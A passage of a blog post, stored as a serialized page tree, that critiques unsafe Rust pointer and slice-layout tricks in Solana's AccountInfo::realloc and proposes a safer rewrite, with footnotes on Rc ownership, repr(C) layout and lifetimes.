u32",{"type":28,"tag":116,"props":17213,"children":17214},{"style":266},[17215],{"type":33,"value":384},{"type":28,"tag":116,"props":17217,"children":17218},{"class":245,"line":750},[17219,17224,17229,17233],{"type":28,"tag":116,"props":17220,"children":17221},{"style":370},[17222],{"type":33,"value":17223},"    *",{"type":28,"tag":116,"props":17225,"children":17226},{"style":272},[17227],{"type":33,"value":17228},"original_data_len_ptr",{"type":28,"tag":116,"props":17230,"children":17231},{"style":376},[17232],{"type":33,"value":8500},{"type":28,"tag":116,"props":17234,"children":17235},{"style":339},[17236],{"type":33,"value":16636},{"type":28,"tag":116,"props":17238,"children":17239},{"class":245,"line":779},[17240],{"type":28,"tag":116,"props":17241,"children":17242},{"style":266},[17243],{"type":33,"value":406},{"type":28,"tag":29,"props":17245,"children":17246},{},[17247,17249,17254,17256,17261,17263,17268,17270,17275,17277,17284,17286,17293,17294,17301,17302,17309,17310,17317],{"type":33,"value":17248},"It's marked ",{"type":28,"tag":98,"props":17250,"children":17252},{"className":17251},[],[17253],{"type":33,"value":14022},{"type":33,"value":17255},", properly documented, but there's just one problem: we need this for ",{"type":28,"tag":98,"props":17257,"children":17259},{"className":17258},[],[17260],{"type":33,"value":13304},{"type":33,"value":17262},", which originally was not ",{"type":28,"tag":98,"props":17264,"children":17266},{"className":17265},[],[17267],{"type":33,"value":14022},{"type":33,"value":17269},". So, in the name of not breaking API compatibility, the Solana team just threw the call in an ",{"type":28,"tag":98,"props":17271,"children":17273},{"className":17272},[],[17274],{"type":33,"value":14022},{"type":33,"value":17276}," block and added ",{"type":28,"tag":87,"props":17278,"children":17281},{"href":17279,"rel":17280},"https://docs.rs/solana-program/1.10.30/solana_program/account_info/struct.AccountInfo.html#safety-1",[91],[17282],{"type":33,"value":17283},"a doc comment",{"type":33,"value":17285}," - adding to the ",{"type":28,"tag":87,"props":17287,"children":17290},{"href":17288,"rel":17289},"https://docs.rs/solana-program/1.10.30/solana_program/program/fn.invoke_signed_unchecked.html#safety",[91],[17291],{"type":33,"value":17292},"small",{"type":33,"value":6129},{"type":28,"tag":87,"props":17295,"children":17298},{"href":17296,"rel":17297},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memcpy.html#safety",[91],[17299],{"type":33,"value":17300},"pile",{"type":33,"value":6129},{"type":28,"tag":87,"props":17303,"children":17306},{"href":17304,"rel":17305},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memset.html#safety",[91],[17307],{"type":33,"value":17308},"of",{"type":33,"value":6129},{"type":28,"tag":87,"props":17311,"children":17314},{"href":17312,"rel":17313},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memcmp.html#safety",[91],[17315],{"type":33,"value":17316},"functions",{"type":33,"value":17318}," that are actually unsafe but aren't marked as such for API compatibility reasons (and the last three - all related to each other - don't even have the comment until version 1.11, which isn't even on mainnet as of the time of writing).",{"type":28,"tag":63,"props":17320,"children":17322},{"id":17321},"towards-safer-unsafe",[17323,17325],{"type":33,"value":17324},"Towards safer ",{"type":28,"tag":98,"props":17326,"children":17328},{"className":17327},[],[17329],{"type":33,"value":14022},{"type":28,"tag":29,"props":17331,"children":17332},{},[17333,17335,17340,17342,17347,17349,17356],{"type":33,"value":17334},"Let's circle back to that main ",{"type":28,"tag":98,"props":17336,"children":17338},{"className":17337},[],[17339],{"type":33,"value":14022},{"type":33,"value":17341}," block inside ",{"type":28,"tag":98,"props":17343,"children":17345},{"className":17344},[],[17346],{"type":33,"value":13304},{"type":33,"value":17348}," for a bit, shall we? As a reminder, it looks like ",{"type":28,"tag":87,"props":17350,"children":17353},{"href":17351,"rel":17352},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#127-136",[91],[17354],{"type":33,"value":17355},"this",{"type":33,"value":4160},{"type":28,"tag":234,"props":17358,"children":17360},{"className":2652,"code":17359,"language":2651,"meta":7,"style":7},"// realloc\nunsafe {\n    // First set new length in the serialized data\n    let ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n    *ptr = new_len as u64;\n\n    // Then set the new length in the local slice\n    let ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n    *ptr = new_len as u64;\n}\n",[17361],{"type":28,"tag":98,"props":17362,"children":17363},{"__ignoreMap":7},[17364,17372,17383,17391,17478,17509,17516,17524,17651,17682],{"type":28,"tag":116,"props":17365,"children":17366},{"class":245,"line":246},[17367],{"type":28,"tag":116,"props":17368,"children":17369},{"style":250},[17370],{"type":33,"value":17371},"// realloc\n",{"type":28,"tag":116,"props":17373,"children":17374},{"class":245,"line":256},[17375,17379],{"type":28,"tag":116,"props":17376,"children":17377},{"style":376},[17378],{"type":33,"value":14022},{"type":28,"tag":116,"props":17380,"children":17381},{"style":266},[17382],{"type":33,"value":1291},{"type":28,"tag":116,"props":17384,"children":17385},{"class":245,"line":293},[17386],{"type":28,"tag":116,"props":17387,"children":17388},{"style":250},[17389],{"type":33,"value":17390},"    // First set new length in the serialized data\n",{"type":28,"tag":116,"props":17392,"children":17393},{"class":245,"line":361},[17394,17398,17402,17406,17410,17414,17418,17422,17426,17430,17434,17438,17442,17446,17450,17454,17458,17462,17466,17470,17474],{"type":28,"tag":116,"props":17395,"children":17396},{"style":376},[17397],{"type":33,"value":2672},{"type":28,"tag":116,"props":17399,"children":17400},{"style":272},[17401],{"type":33,"value":13523},{"type":28,"tag":116,"props":17403,"children":17404},{"style":370},[17405],{"type":33,"value":2226},{"type":28,"tag":116,"props":17407,"children":17408},{"style":376},[17409],{"type":33,"value":13463},{"type":28,"tag":116,"props":17411,"children":17412},{"style":370},[17413],{"type":33,"value":141},{"type":28,"tag":116,"props":17415,"children":17416},{"style":282},[17417],{"type":33,"value":13540},{"type":28,"tag":116,"props":17419,"children":17420},{"style":266},[17421],{"type":33,"value":13545},{"type":28,"tag":116,"props":17423,"children":17424},{"style":370},[17425],{"type":33,"value":2803},{"type":28,"tag":116,"props":17427,"children":17428},{"style":282},[17429],{"type":33,"value":13554},{"type":28,"tag":116,"props":17431,"children":17432},{"style":266},[17433],{"type":33,"value":13545},{"type":28,"tag":116,"props":17435,"children":17436},{"style":370},[17437],{"type":33,"value":141},{"type":28,"tag":116,"props":17439,"children":17440},{"style":282},[17441],{"type":33,"value":13567},{"type":28,"tag":116,"props":17443,"children":17444},{"style":266},[17445],{"type":33,"value":313},{"type":28,"tag":116,"props":17447,"children":17448},{"style":370},[17449],{"type":33,"value":3996},{"type":28,"tag":116,"props":17451,"children":17452},{"style":350},[17453],{"type":33,"value":3745},{"type":28,"tag":116,"props":17455,"children":17456},{"style":266},[17457],{"type":33,"value":1609},{"type":28,"tag":116,"props":17459,"children":17460},{"style":376},[17461],{"type":33,"value":8513},{"type":28,"tag":116,"props":17463,"children":17464},{"style":370},[17465],{"type":33,"value":9484},{"type":28,"tag":116,"props":17467,"children":17468},{"style":376},[17469],{"type":33,"value":3394},{"type":28,"tag":116,"props":17471,"children":17472},{"style":339},[17473],{"type":33,"value":5531},{"type":28,"tag":116,"props":17475,"children":17476},{"style":266},[17477],{"type":33,"value":384},{"type":28,"tag":116,"props":17479,"children":17480},{"class":245,"line":387},[17481,17485,17489,17493,17497,17501,17505],{"type":28,"tag":116,"props":17482,"children":17483},{"style":370},[17484],{"type":33,"value":17223},{"type":28,"tag":116,"props":17486,"children":17487},{"style":272},[17488],{"type":33,"value":13615},{"type":28,"tag":116,"props":17490,"children":17491},{"style":370},[17492],{"type":33,"value":2226},{"type":28,"tag":116,"props":17494,"children":17495},{"style":272},[17496],{"type":33,"value":13624},{"type":28,"tag":116,"props":17498,"children":17499},{"style":376},[17500],{"type":33,"value":8500},{"type":28,"tag":116,"props":17502,"children":17503},{"style":339},[17504],{"type":33,"value":5531},{"type":28,"tag":116,"props":17506,"children":17507},{"style":266},[17508],{"type":33,"value":384},{"type":28,"tag":116,"props":17510,"children":17511},{"class":245,"line":400},[17512],{"type":28,"tag":116,"props":17513,"children":17514},{"emptyLinePlaceholder":19},[17515],{"type":33,"value":1044},{"type":28,"tag":116,"props":17517,"children":17518},{"class":245,"line":614},[17519],{"type":28,"tag":116,"props":17520,"children":17521},{"style":250},[17522],{"type":33,"value":17523},"    // Then set the new length in the local slice\n",{"type":28,"tag":116,"props":17525,"children":17526},{"class":245,"line":631},[17527,17531,17535,17539,17543,17547,17551,17555,17559,17563,17567,17571,17575,17579,17583,17587,17591,17595,17599,17603,17607,17611,17615,17619,17623,17627,17631,17635,17639,17643,17647],{"type":28,"tag":116,"props":17528,"children":17529},{"style":376},[17530],{"type":33,"value":2672},{"type":28,"tag":116,"props":17532,"children":17533},{"style":272},[17534],{"type":33,"value":13523},{"type":28,"tag":116,"props":17536,"children":17537},{"style":370},[17538],{"type":33,"value":2226},{"type":28,"tag":116,"props":17540,"children":17541},{"style":370},[17542],{"type":33,"value":6813},{"type":28,"tag":116,"props":17544,"children":17545},{"style":376},[17546],{"type":33,"value":3394},{"type":28,"tag":116,"props":17548,"children":17549},{"style":370},[17550],{"type":33,"value":9484},{"type":28,"tag":116,"props":17552,"children":17553},{"style":266},[17554],{"type":33,"value":13683},{"type":28,"tag":116,"props":17556,"children":17557},{"style":376},[17558],{"type":33,"value":13379},{"type":28,"tag":116,"props":17560,"children":17561},{"style":370},[17562],{"type":33,"value":141},{"type":28,"tag":116,"props":17564,"children":17565},{"style":266},[17566],{"type":33,"value":3372},{"type":28,"tag":116,"props":17568,"children":17569},{"style":370},[17570],{"type":33,"value":141},{"type":28,"tag":116,"props":17572,"children":17573},{"style":282},[17574],{"type":33,"value":13704},{"type":28,"tag":116,"props":17576,"children":17577},{"style":266},[17578],{"type":33,"value":13709},{"type":28,"tag":116,"props":17580,"children":17581},{"style":376},[17582],{"type":33,"value":8513},{"type":28,"tag":116,"props":17584,"children":17585},{"style":370},[17586],{"type":33,"value":9484},{"type":28,"tag":116,"props":17588,"children":17589},{"style":376},[17590],{"type":33,"value":9323},{"type":28,"tag":116,"props":17592,"children":17593},{"style":339},[17594],{"type":33,"value":5531},{"type":28,"tag":116,"props":17596,"children":17597},{"style":266},[17598],{"type":33,"value":1829},{"type":28,"tag":116,"props":17600,"children":17601},{"style":370},[17602],{"type":33,"value":141},{"type":28,"tag":116,"props":17604,"children":17605},{"style":282},[17606],{"type":33,"value":13567},{"type":28,"tag":116,"props":17608,"children":17609},{"style":266},[17610],{"type":33,"value":313},{"type":28,"tag":116,"props":17612,"children":17613},{"style":350},[17614],{"type":33,"value":1824},{"type":28,"tag":116,"props":17616,"children":17617},{"style":266},[17618],{"type":33,"value":1609},{"type":28,"tag":116,"props":17620,"children":17621},{"style":376},[17622],{"type":33,"value":8513},{"type":28,"tag":116,"props":17624,"children":17625},{"style":339},[17626],{"type":33,"value":5531},{"type":28,"tag":116,"props":17628,"children":17629},{"style":266},[17630],{"type":33,"value":1609},{"type":28,"tag":116,"props":17632,"children":17633},{"style":376},[17634],{"type":33,"value":8513},{"type":28,"tag":116,"props":17636,"children":17637},{"style":370},[17638],{"type":33,"value":9484},{"type":28,"tag":116,"props":17640,"children":17641},{"style":376},[17642],{"type":33,"value":3394},{"type":28,"tag":116,"props":17644,"children":17645},{"style":339},[17646],{"type":33,"value":5531},{"type":28,"tag":116,"props":17648,"children":17649},{"style":266},[17650],{"type":33,"value":895},{"type":28,"tag":116,"props":17652,"children":17653},{"class":245,"line":665},[17654,17658,17662,17666,17670,17674,17678],{"type":28,"tag":116,"props":17655,"children":17656},{"style":370},[17657],{"type":33,"value":17223},{"type":28,"tag":116,"props":17659,"children":17660},{"style":272},[17661],{"type":33,"value":13615},{"type":28,"tag":116,"props":17663,"children":17664},{"style":370},[17665],{"type":33,"value":2226},{"type":28,"tag":116,"props":17667,"children":17668},{"style":272},[17669],{"type":33,"value":13624},{"type":28,"tag":116,"props":17671,"children":17672},{"style":376},[17673],{"type":33,"value":8500},{"type":28,"tag":116,"props":17675,"children":17676},{"style":339},[17677],{"type":33,"value":5531},{"type":28,"tag":116,"props":17679,"children":17680},{"style":266},[17681],{"type":33,"value":384},{"type":28,"tag":116,"props":17683,"children":17684},{"class":245,"line":713},[17685],{"type":28,"tag":116,"props":17686,"children":17687},{"style":266},[17688],{"type":33,"value":406},{"type":28,"tag":29,"props":17690,"children":17691},{},[17692,17694,17699],{"type":33,"value":17693},"We've seen how we could have ran into all sorts of issues here, with the usage of slice layout details, the reborrow creating an unbounded lifetime, and the ",{"type":28,"tag":98,"props":17695,"children":17697},{"className":17696},[],[17698],{"type":33,"value":15166},{"type":33,"value":17700}," borrow not accurately representing the actual usage of its contents. We can do better than this.",{"type":28,"tag":29,"props":17702,"children":17703},{},[17704,17706,17711,17713,17718,17720,17725,17727,17732,17734,17739,17741,17747,17749,17759,17761,17772],{"type":33,"value":17705},"First, let's deal with the ",{"type":28,"tag":98,"props":17707,"children":17709},{"className":17708},[],[17710],{"type":33,"value":15166},{"type":33,"value":17712}," borrowing issue. When we ",{"type":28,"tag":98,"props":17714,"children":17716},{"className":17715},[],[17717],{"type":33,"value":13540},{"type":33,"value":17719},", we get a ",{"type":28,"tag":98,"props":17721,"children":17723},{"className":17722},[],[17724],{"type":33,"value":16403},{"type":33,"value":17726}," back, which represents our borrow of the ",{"type":28,"tag":98,"props":17728,"children":17730},{"className":17729},[],[17731],{"type":33,"value":15166},{"type":33,"value":17733},"'s data. The fix here is simple: keep that ",{"type":28,"tag":98,"props":17735,"children":17737},{"className":17736},[],[17738],{"type":33,"value":16403},{"type":33,"value":17740}," around and use it to access the data, instead of using ",{"type":28,"tag":98,"props":17742,"children":17744},{"className":17743},[],[17745],{"type":33,"value":17746},"RefCell::as_ptr",{"type":33,"value":17748},". Next, the slice; again, the fix is simple. Instead of attempting to modify just the length field, and resorting to using layout information to do so since Rust slices are immutable, we can simply construct a new slice reference and set that. The Rust compiler",{"type":28,"tag":15136,"props":17750,"children":17751},{},[17752],{"type":28,"tag":87,"props":17753,"children":17757},{"href":17754,"ariaDescribedBy":17755,"dataFootnoteRef":7,"id":17756},"#user-content-fn-rustc-llvm",[15143],"user-content-fnref-rustc-llvm",[17758],{"type":33,"value":17190},{"type":33,"value":17760}," is smart enough to realize that the only thing changing is the length field, and so only emits the code to set the length",{"type":28,"tag":15136,"props":17762,"children":17763},{},[17764],{"type":28,"tag":87,"props":17765,"children":17769},{"href":17766,"ariaDescribedBy":17767,"dataFootnoteRef":7,"id":17768},"#user-content-fn-godbolt",[15143],"user-content-fnref-godbolt",[17770],{"type":33,"value":17771},"5",{"type":33,"value":17773},". So then we get:",{"type":28,"tag":234,"props":17775,"children":17777},{"className":2652,"code":17776,"language":2651,"meta":7,"style":7},"let mut slice = self.try_borrow_mut_data()?;\n\n// First set new length in the serialized data\nlet ptr = unsafe { slice.as_mut_ptr().offset(-8) } as *mut u64;\nunsafe { *ptr = new_len as u64 };\n\n// Then set the new length in the local slice\n*slice = unsafe { std::slice::from_raw_parts_mut(slice.as_mut_ptr(), new_len) };\n",[17778],{"type":28,"tag":98,"props":17779,"children":17780},{"__ignoreMap":7},[17781,17825,17832,17839,17923,17963,17970,17977],{"type":28,"tag":116,"props":17782,"children":17783},{"class":245,"line":246},[17784,17788,17792,17797,17801,17805,17809,17813,17817,17821],{"type":28,"tag":116,"props":17785,"children":17786},{"style":376},[17787],{"type":33,"value":11455},{"type":28,"tag":116,"props":17789,"children":17790},{"style":376},[17791],{"type":33,"value":2677},{"type":28,"tag":116,"props":17793,"children":17794},{"style":272},[17795],{"type":33,"value":17796}," slice",{"type":28,"tag":116,"props":17798,"children":17799},{"style":370},[17800],{"type":33,"value":2226},{"type":28,"tag":116,"props":17802,"children":17803},{"style":376},[17804],{"type":33,"value":13463},{"type":28,"tag":116,"props":17806,"children":17807},{"style":370},[17808],{"type":33,"value":141},{"type":28,"tag":116,"props":17810,"children":17811},{"style":282},[17812],{"type":33,"value":13540},{"type":28,"tag":116,"props":17814,"children":17815},{"style":266},[17816],{"type":33,"value":13545},{"type":28,"tag":116,"props":17818,"children":17819},{"style":370},[17820],{"type":33,"value":2825},{"type":28,"tag":116,"props":17822,"children":17823},{"style":266},[17824],{"type":33,"value":384},{"type":28,"tag":116,"props":17826,"children":17827},{"class":245,"line":256},[17828],{"type":28,"tag":116,"props":17829,"children":17830},{"emptyLinePlaceholder":19},[17831],{"type":33,"value":1044},{"type":28,"tag":116,"props":17833,"children":17834},{"class":245,"line":293},[17835],{"type":28,"tag":116,"props":17836,"children":17837},{"style":250},[17838],{"type":33,"value":14069},{"type":28,"tag":116,"props":17840,"children":17841},{"class":245,"line":361},[17842,17846,17850,17854,17858,17862,17866,17870,17874,17878,17882,17886,17890,17894,17898,17903,17907,17911,17915,17919],{"type":28,"tag":116,"props":17843,"children":17844},{"style":376},[17845],{"type":33,"value":11455},{"type":28,"tag":116,"props":17847,"children":17848},{"style":272},[17849],{"type":33,"value":13523},{"type":28,"tag":116,"props":17851,"children":17852},{"style":370},[17853],{"type":33,"value":2226},{"type":28,"tag":116,"props":17855,"children":17856},{"style":376},[17857],{"type":33,"value":14256},{"type":28,"tag":116,"props":17859,"children":17860},{"style":266},[17861],{"type":33,"value":9254},{"type":28,"tag":116,"props":17863,"children":17864},{"style":272},[17865],{"type":33,"value":14976},{"type":28,"tag":116,"props":17867,"children":17868},{"style":370},[17869],{"type":33,"value":141},{"type":28,"tag":116,"props":17871,"children":17872},{"style":282},[17873],{"type":33,"value":13554},{"type":28,"tag":116,"props":17875,"children":17876},{"style":266},[17877],{"type":33,"value":13545},{"type":28,"tag":116,"props":17879,"children":17880},{"style":370},[17881],{"type":33,"value":141},{"type":28,"tag":116,"props":17883,"children":17884},{"style":282},[17885],{"type":33,"value":13567},{"type":28,"tag":116,"props":17887,"children":17888},{"style":266},[17889],{"type":33,"value":313},{"type":28,"tag":116,"props":17891,"children":17892},{"style":370},[17893],{"type":33,"value":3996},{"type":28,"tag":116,"props":17895,"children":17896},{"style":350},[17897],{"type":33,"value":3745},{"type":28,"tag":116,"props":17899,"children":17900},{"style":266},[17901],{"type":33,"value":17902},") } ",{"type":28,"tag":116,"props":17904,"children":17905},{"style":376},[17906],{"type":33,"value":8513},{"type":28,"tag":116,"props":17908,"children":17909},{"style":370},[17910],{"type":33,"value":9484},{"type":28,"tag":116,"props":17912,"children":17913},{"style":376},[17914],{"type":33,"value":3394},{"type":28,"tag":116,"props":17916,"children":17917},{"style":339},[17918],{"type":33,"value":5531},{"type":28,"tag":116,"props":17920,"children":17921},{"style":266},[17922],{"type":33,"value":384},{"type":28,"tag":116,"props":17924,"children":17925},{"class":245,"line":387},[17926,17930,17934,17938,17942,17946,17950,17954,17958],{"type":28,"tag":116,"props":17927,"children":17928},{"style":376},[17929],{"type":33,"value":14022},{"type":28,"tag":116,"props":17931,"children":17932},{"style":266},[17933],{"type":33,"value":9254},{"type":28,"tag":116,"props":17935,"children":17936},{"style":370},[17937],{"type":33,"value":4240},{"type":28,"tag":116,"props":17939,"children":17940},{"style":272},[17941],{"type":33,"value":13615},{"type":28,"tag":116,"props":17943,"children":17944},{"style":370},[17945],{"type":33,"value":2226},{"type":28,"tag":116,"props":17947,"children":17948},{"style":272},[17949],{"type":33,"value":13624},{"type":28,"tag":116,"props":17951,"children":17952},{"style":376},[17953],{"type":33,"value":8500},{"type":28,"tag":116,"props":17955,"children":17956},{"style":339},[17957],{"type":33,"value":5531},{"type":28,"tag":116,"props":17959,"children":17960},{"style":266},[17961],{"type":33,"value":17962}," };\n",{"type":28,"tag":116,"props":17964,"children":17965},{"class":245,"line":400},[17966],{"type":28,"tag":116,"props":17967,"children":17968},{"emptyLinePlaceholder":19},[17969],{"type":33,"value":1044},{"type":28,"tag":116,"props":17971,"children":17972},{"class":245,"line":614},[17973],{"type":28,"tag":116,"props":17974,"children":17975},{"style":250},[17976],{"type":33,"value":15801},{"type":28,"tag":116,"props":17978,"children":17979},{"class":245,"line":631},[17980,17984,17988,17992,17996,18001,18005,18009,18013,18018,18022,18026,18030,18034,18039,18043],{"type":28,"tag":116,"props":17981,"children":17982},{"style":370},[17983],{"type":33,"value":4240},{"type":28,"tag":116,"props":17985,"children":17986},{"style":272},[17987],{"type":33,"value":14976},{"type":28,"tag":116,"props":17989,"children":17990},{"style":370},[17991],{"type":33,"value":2226},{"type":28,"tag":116,"props":17993,"children":17994},{"style":376},[17995],{"type":33,"value":14256},{"type":28,"tag":116,"props":17997,"children":17998},{"style":266},[17999],{"type":33,"value":18000}," { std",{"type":28,"tag":116,"props":18002,"children":18003},{"style":370},[18004],{"type":33,"value":3151},{"type":28,"tag":116,"props":18006,"children":18007},{"style":266},[18008],{"type":33,"value":14976},{"type":28,"tag":116,"props":18010,"children":18011},{"style":370},[18012],{"type":33,"value":3151},{"type":28,"tag":116,"props":18014,"children":18015},{"style":282},[18016],{"type":33,"value":18017},"from_raw_parts_mut",{"type":28,"tag":116,"props":18019,"children":18020},{"style":266},[18021],{"type":33,"value":313},{"type":28,"tag":116,"props":18023,"children":18024},{"style":272},[18025],{"type":33,"value":14976},{"type":28,"tag":116,"props":18027,"children":18028},{"style":370},[18029],{"type":33,"value":141},{"type":28,"tag":116,"props":18031,"children":18032},{"style":282},[18033],{"type":33,"value":13554},{"type":28,"tag":116,"props":18035,"children":18036},{"style":266},[18037],{"type":33,"value":18038},"(), ",{"type":28,"tag":116,"props":18040,"children":18041},{"style":272},[18042],{"type":33,"value":13388},{"type":28,"tag":116,"props":18044,"children":18045},{"style":266},[18046],{"type":33,"value":14411},{"type":28,"tag":29,"props":18048,"children":18049},{},[18050,18052,18057,18059,18064,18066,18071,18073],{"type":33,"value":18051},"No more pointer casting except for the one place that actually needs it (since the ABI for the serialized buffer uses a ",{"type":28,"tag":98,"props":18053,"children":18055},{"className":18054},[],[18056],{"type":33,"value":7714},{"type":33,"value":18058}," and not a ",{"type":28,"tag":98,"props":18060,"children":18062},{"className":18061},[],[18063],{"type":33,"value":16263},{"type":33,"value":18065}," for the size field, given that ",{"type":28,"tag":98,"props":18067,"children":18069},{"className":18068},[],[18070],{"type":33,"value":16263},{"type":33,"value":18072}," is architecture-dependent), and no dependency on slice reference internals!",{"type":28,"tag":15136,"props":18074,"children":18075},{},[18076],{"type":28,"tag":87,"props":18077,"children":18081},{"href":18078,"ariaDescribedBy":18079,"dataFootnoteRef":7,"id":18080},"#user-content-fn-slice-unbound-lifetime",[15143],"user-content-fnref-slice-unbound-lifetime",[18082],{"type":33,"value":18083},"6",{"type":28,"tag":18085,"props":18086,"children":18089},"section",{"className":18087,"dataFootnotes":7},[18088],"footnotes",[18090,18097],{"type":28,"tag":63,"props":18091,"children":18094},{"className":18092,"id":15143},[18093],"sr-only",[18095],{"type":33,"value":18096},"Footnotes",{"type":28,"tag":455,"props":18098,"children":18099},{},[18100,18205,18223,18278,18291,18319],{"type":28,"tag":459,"props":18101,"children":18103},{"id":18102},"user-content-fn-rc-refs",[18104,18106,18112,18114,18119,18121,18125,18127,18131,18133,18138,18140,18146,18148,18153,18155,18165,18167,18172,18174,18179,18181,18186,18188,18194,18196],{"type":33,"value":18105},"I find it helpful to view owning an ",{"type":28,"tag":98,"props":18107,"children":18109},{"className":18108},[],[18110],{"type":33,"value":18111},"Rc\u003CT>",{"type":33,"value":18113}," as holding a shared reference to the underlying ",{"type":28,"tag":98,"props":18115,"children":18117},{"className":18116},[],[18118],{"type":33,"value":5659},{"type":33,"value":18120}," (stored in the magical land of I-don't-need-to-care-about-this-object-not-living-long-enough known as the heap). Owning the ",{"type":28,"tag":2583,"props":18122,"children":18123},{},[18124],{"type":33,"value":16119},{"type":33,"value":18126}," ensures that the actual ",{"type":28,"tag":2583,"props":18128,"children":18129},{},[18130],{"type":33,"value":3372},{"type":33,"value":18132}," stays alive, however all you have is a reference to the ",{"type":28,"tag":98,"props":18134,"children":18136},{"className":18135},[],[18137],{"type":33,"value":5659},{"type":33,"value":18139}," (through the ",{"type":28,"tag":98,"props":18141,"children":18143},{"className":18142},[],[18144],{"type":33,"value":18145},"Deref\u003CTarget = T>",{"type":33,"value":18147}," impl) - ",{"type":28,"tag":2583,"props":18149,"children":18150},{},[18151],{"type":33,"value":18152},"not",{"type":33,"value":18154}," ownership ",{"type":28,"tag":2583,"props":18156,"children":18157},{},[18158,18160],{"type":33,"value":18159},"of the ",{"type":28,"tag":98,"props":18161,"children":18163},{"className":18162},[],[18164],{"type":33,"value":5659},{"type":33,"value":18166},". In short, owning an ",{"type":28,"tag":98,"props":18168,"children":18170},{"className":18169},[],[18171],{"type":33,"value":18111},{"type":33,"value":18173}," is owning a (shared, read-only) reference to ",{"type":28,"tag":98,"props":18175,"children":18177},{"className":18176},[],[18178],{"type":33,"value":5659},{"type":33,"value":18180},", not owning ",{"type":28,"tag":98,"props":18182,"children":18184},{"className":18183},[],[18185],{"type":33,"value":5659},{"type":33,"value":18187}," directly like with ",{"type":28,"tag":98,"props":18189,"children":18191},{"className":18190},[],[18192],{"type":33,"value":18193},"Box\u003CT>",{"type":33,"value":18195},". ",{"type":28,"tag":87,"props":18197,"children":18202},{"href":18198,"ariaLabel":18199,"className":18200,"dataFootnoteBackref":7},"#user-content-fnref-rc-refs","Back to reference 1",[18201],"data-footnote-backref",[18203],{"type":33,"value":18204},"↩",{"type":28,"tag":459,"props":18206,"children":18208},{"id":18207},"user-content-fn-sendsync",[18209,18215,18216],{"type":28,"tag":98,"props":18210,"children":18212},{"className":18211},[],[18213],{"type":33,"value":18214},"!Send + !Sync",{"type":33,"value":6129},{"type":28,"tag":87,"props":18217,"children":18221},{"href":18218,"ariaLabel":18219,"className":18220,"dataFootnoteBackref":7},"#user-content-fnref-sendsync","Back to reference 2",[18201],[18222],{"type":33,"value":18204},{"type":28,"tag":459,"props":18224,"children":18226},{"id":18225},"user-content-fn-layout",[18227,18229,18234,18235,18248,18250,18255,18257,18262,18264,18269,18271],{"type":33,"value":18228},"Note that this is a terrible idea for yet another reason: ",{"type":28,"tag":98,"props":18230,"children":18232},{"className":18231},[],[18233],{"type":33,"value":14602},{"type":33,"value":5172},{"type":28,"tag":87,"props":18236,"children":18239},{"href":18237,"rel":18238},"https://docs.rs/solana-program/1.10.30/src/solana_program/account_info.rs.html#15-33",[91],[18240,18242],{"type":33,"value":18241},"not declared with ",{"type":28,"tag":98,"props":18243,"children":18245},{"className":18244},[],[18246],{"type":33,"value":18247},"#[repr(C)]",{"type":33,"value":18249},", meaning that, once again, we're dealing with no layout guarantees. But thanks to the power of blockchain, fixing this ABI interface ",{"type":28,"tag":2583,"props":18251,"children":18252},{},[18253],{"type":33,"value":18254},"breaks the entire chain",{"type":33,"value":18256}," since old contracts will no longer work. So, we're stuck with cobbling together ",{"type":28,"tag":2583,"props":18258,"children":18259},{},[18260],{"type":33,"value":18261},"some",{"type":33,"value":18263}," kind of interface to the specific layout of the specific ",{"type":28,"tag":98,"props":18265,"children":18267},{"className":18266},[],[18268],{"type":33,"value":16171},{"type":33,"value":18270}," versions used to build on-chain code for all eternity... ",{"type":28,"tag":87,"props":18272,"children":18276},{"href":18273,"ariaLabel":18274,"className":18275,"dataFootnoteBackref":7},"#user-content-fnref-layout","Back to reference 3",[18201],[18277],{"type":33,"value":18204},{"type":28,"tag":459,"props":18279,"children":18281},{"id":18280},"user-content-fn-rustc-llvm",[18282,18284],{"type":33,"value":18283},"Actually, it's LLVM that does the optimization ",{"type":28,"tag":87,"props":18285,"children":18289},{"href":18286,"ariaLabel":18287,"className":18288,"dataFootnoteBackref":7},"#user-content-fnref-rustc-llvm","Back to reference 4",[18201],[18290],{"type":33,"value":18204},{"type":28,"tag":459,"props":18292,"children":18294},{"id":18293},"user-content-fn-godbolt",[18295,18302,18304,18310,18312],{"type":28,"tag":87,"props":18296,"children":18299},{"href":18297,"rel":18298},"https://godbolt.org/z/PK46xMbxc",[91],[18300],{"type":33,"value":18301},"Click here",{"type":33,"value":18303}," for a Compiler Explorer link showing this - note that the code for both implementations is almost identical. And yes, it's x86_64 and not eBPF, but unfortunately Compiler Explorer doesn't have Rust ",{"type":28,"tag":98,"props":18305,"children":18307},{"className":18306},[],[18308],{"type":33,"value":18309},"libcore",{"type":33,"value":18311}," available for other architectures yet. ",{"type":28,"tag":87,"props":18313,"children":18317},{"href":18314,"ariaLabel":18315,"className":18316,"dataFootnoteBackref":7},"#user-content-fnref-godbolt","Back to reference 5",[18201],[18318],{"type":33,"value":18204},{"type":28,"tag":459,"props":18320,"children":18322},{"id":18321},"user-content-fn-slice-unbound-lifetime",[18323,18325,18330,18332,18338,18340,18346,18348,18354,18356,18362,18364,18370,18372,18377,18379],{"type":33,"value":18324},"The astute reader may have noticed that ",{"type":28,"tag":98,"props":18326,"children":18328},{"className":18327},[],[18329],{"type":33,"value":18017},{"type":33,"value":18331}," still returns an unbounded lifetime (notice in the signature ",{"type":28,"tag":98,"props":18333,"children":18335},{"className":18334},[],[18336],{"type":33,"value":18337},"unsafe fn from_raw_parts_mut\u003C'a, T>(data: *mut T, len: usize) -> &'a mut [T]",{"type":33,"value":18339},", the lifetime parameter ",{"type":28,"tag":98,"props":18341,"children":18343},{"className":18342},[],[18344],{"type":33,"value":18345},"'a",{"type":33,"value":18347}," does not appear in the arguments). However, we immediately constrain the lifetime by assigning it to ",{"type":28,"tag":98,"props":18349,"children":18351},{"className":18350},[],[18352],{"type":33,"value":18353},"*slice",{"type":33,"value":18355},", which is ",{"type":28,"tag":98,"props":18357,"children":18359},{"className":18358},[],[18360],{"type":33,"value":18361},"&'info [u8]",{"type":33,"value":18363}," (where ",{"type":28,"tag":98,"props":18365,"children":18367},{"className":18366},[],[18368],{"type":33,"value":18369},"'info",{"type":33,"value":18371}," is the lifetime parameter of the 